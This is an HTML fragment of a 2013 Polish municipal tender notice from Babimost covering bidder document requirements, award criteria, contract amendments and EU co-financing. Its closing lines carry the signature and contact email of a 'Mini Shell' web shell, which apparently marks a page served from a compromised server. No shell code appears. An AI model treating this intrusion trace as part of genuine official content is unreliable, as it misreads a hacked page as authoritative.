<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. W szczególności Zamawiający dopuszcza: - aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp., - zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod warunkiem, że takiej zgody udzieli instytucja dofinansowująca, i że Zamawiający nie straci dofinansowania - jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, - ze względu na dofinansowane zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie oraz zaleceń wydanych przez Instytucje Dofinansowujące</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/ugbabimost<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - Urząd Miejski w Babimoście biuro nr 5, od dnia 19.02.2013r.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2013 godzina 10:00, miejsce: Sekretariat Urzędu Miejskiego w Babimoście ul. Rynek 3, 66 - 110 Babimost.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt będzie dofinansowywany ze środków Unii Europejskiej w ramach działania 413 Wdrażania Lokalnych Strategii Rozwoju w zakresie Operacji Odpowiadajacej Warunkom Przyznania Pomocy w ramach działania Odnowa i Rozwój Wsi objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com